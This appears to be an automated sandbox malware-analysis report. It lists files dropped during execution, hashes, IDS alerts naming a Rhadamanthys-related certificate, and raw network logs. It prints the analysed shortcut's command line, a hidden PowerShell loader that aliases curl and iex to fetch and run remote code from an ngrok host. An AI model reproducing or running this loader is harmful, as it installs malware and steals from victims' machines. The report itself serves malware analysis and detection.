                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11280
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                  MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                  SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                  SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                  SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                  MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                  SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                  SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                  SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):98880
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                  MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                  SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                  SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                  SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107677
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                  MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                  SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                  SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                  SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\854113748.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):979567347
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03081039114816888
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                                                                  MD5:3630E7B5DBB0E1C85EB706E03083DCCD
                                                                                                                                                                                                                                                                                  SHA1:359B68BAC271E72B8A1049B03EFF8F0D99001446
                                                                                                                                                                                                                                                                                  SHA-256:3A101A1B1DCDAB3321FA1157C86B3A418965F542051FF70AF24FA0B9B4CA9D85
                                                                                                                                                                                                                                                                                  SHA-512:8A86B5C5464F84701C4D069312F352E08822B7E397F09ECEA473E7EE1C5C88C98035B92E9977F9A5EE9C436E375876D6D8E5EA8AD47ED761602EAADF5E24AAA1
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: qxjDerXRGR.lnk, Detection: malicious
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.466410836397351
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:3IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSbt:4XD94zWlLZMM6YFHY+t
                                                                                                                                                                                                                                                                                  MD5:365B0526EE3229CCC354707F81C64C99
                                                                                                                                                                                                                                                                                  SHA1:5EEAFFB13B3AEBBE1205072D8B9916A448664F34
                                                                                                                                                                                                                                                                                  SHA-256:57D8A385862EDD64349F17E972073D06090CA690C4D2C56E096732F5F085391F
                                                                                                                                                                                                                                                                                  SHA-512:8A36D6FCB9BFC2D66B2F7EF1E5B29650F66E33308EBA9725C85CFEDA02154177EDA90474290764662DC9B8216438080E875FD434EEDDE4D0FF2FAD3F3419FABA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7275153806203236
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                                  File name:751ietQPnX.lnk
                                                                                                                                                                                                                                                                                  File size:2'614 bytes
                                                                                                                                                                                                                                                                                  MD5:80088bacc66572cd6744243cf62be2ba
                                                                                                                                                                                                                                                                                  SHA1:595caf1d649749b0da44866cd5c13afaf21f5626
                                                                                                                                                                                                                                                                                  SHA256:da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f
                                                                                                                                                                                                                                                                                  SHA512:7c5769b7d343bd3da91e8760d3c7ce44678880aab6d06a3519f5623c851e0cfe68b8306c6342099966368ca5e23d4d8a37e2984f8053d5df2cb298c43ad36739
                                                                                                                                                                                                                                                                                  SSDEEP:48:8GIgax4PsU/uHBCLOrFhGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2uHYOxhdl2uWvZg5Y
                                                                                                                                                                                                                                                                                  TLSH:9351D1252ED41724E3F34D358977A2518E7AF9866C324F1E404045880C62F15DC76F2B
                                                                                                                                                                                                                                                                                  Icon Hash:929e9e96a3f3d6ed

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                                                                                                                                                                                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T18:41:30.742148+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49735 | 162.125.69.18 | 443 | TCP
2024-12-10T18:41:45.354267+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49790 | 162.125.69.18 | 443 | TCP
2024-12-10T18:42:17.083476+0100 | 2854802 | ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert | 1 | 162.213.210.250 | 6499 | 192.168.2.4 | 49834 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.700438023 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.700509071 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.906152010 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.486572981 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.487107038 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.487139940 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.488532066 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.488610029 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.491720915 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.491805077 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.492199898 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.492208004 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.574641943 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.524667025 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.524683952 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.524743080 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.524763107 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.524995089 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.529905081 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.529927969 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858880997 CET49749443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858949900 CET44349749162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.859111071 CET49749443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.909780025 CET49749443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.909818888 CET44349749162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.910393000 CET49750443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.910438061 CET44349750142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.910548925 CET49750443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.919696093 CET49750443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.919725895 CET44349750142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.140116930 CET49753443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.140152931 CET44349753162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.140225887 CET49753443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.143902063 CET49753443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.143913031 CET44349753162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482641935 CET49757443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482690096 CET44349757162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482871056 CET49757443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483220100 CET49758443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483249903 CET44349758172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483484030 CET49758443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483546019 CET49757443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483561993 CET44349757162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483724117 CET49758443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.483735085 CET44349758172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.553119898 CET49760443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.553170919 CET44349760172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.553244114 CET49760443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.554095984 CET49760443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.554109097 CET44349760172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.174570084 CET49762443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.174617052 CET44349762162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.174798012 CET49762443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.175533056 CET49762443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.175548077 CET44349762162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:37.267992020 CET49764443192.168.2.4172.64.41.3
